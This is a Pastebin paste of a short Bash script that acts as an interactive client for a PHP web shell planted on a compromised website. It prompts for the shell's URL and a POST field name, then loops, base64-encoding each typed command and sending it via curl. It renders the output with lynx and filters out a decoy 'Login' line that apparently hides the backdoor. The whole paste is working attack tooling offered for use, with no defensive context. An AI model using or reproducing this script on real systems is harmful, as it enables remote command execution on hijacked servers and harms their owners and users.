Advertisement
Guest User

Untitled

a guest
May 27th, 2015
229
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.39 KB | None | 0 0
  1. #!/bin/sh
  2.  
  3. echo "Enter full URL of site and php file with shell "
  4. read exploiturl
  5. echo "Enter POST field name [Default: user] "
  6. read idfield
  7. if [ -z $idfield ]; then
  8.     idfield="user"
  9. fi
  10. while [ true ]
  11. do
  12. echo -n ">> "
  13. read cmd
  14.  
  15. command=$(echo -n $cmd | base64)
  16.  
  17. curl -s $exploiturl  --data "$idfield=$command" | lynx --dump -stdin | grep -v "____________________ Login"
  18.  
  19. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement